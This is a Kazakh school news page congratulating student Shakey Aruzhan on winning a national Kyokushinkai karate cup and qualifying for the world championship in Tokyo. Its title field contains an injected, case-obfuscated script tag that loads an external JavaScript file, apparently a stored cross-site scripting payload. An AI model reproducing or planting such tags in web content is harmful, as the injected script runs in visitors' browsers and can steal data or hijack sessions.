ҚҰТТЫҚТАЙМЫЗ!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.04.2025

ҚҰТТЫҚТАЙМЫЗ!

2025 жылдың 9–13 сәуірі аралығында Қарағанды қаласында өткен Киокушинкай-кан каратэден Қазақстан Республикасы Кубогында еліміздің 14 облысы мен 3 қаласынан 600-ге жуық спортшы бақ сынады.

Осы байрақты бәсекеде Ақмола облысы білім басқармасының Шортанды ауданы бойынша білім бөлімі “Жолымбет кентінің №2 жалпы орта білім беретін мектебі” КММ-нің 10-сынып оқушысы Шакей Аружан жоғары нәтиже көрсетіп, чемпион атанды!

Аружан 16–17 жас аралығында абс салмақ дәрежесінде барлық қарсыластарын ойсырата жеңіп, І орынды иеленді және Жапонияның Токио қаласында өтетін Әлем чемпионатына жолдама алды!
Аружанға алдағы додаларға сәттілік пен жарқын жеңістер тілейміз!
Мектебіміздің, өңіріміздің және еліміздің абыройын асқақтата бер!

Просмотров: 1027


Пікір қосу



Деректерді қолтаңбаға қосу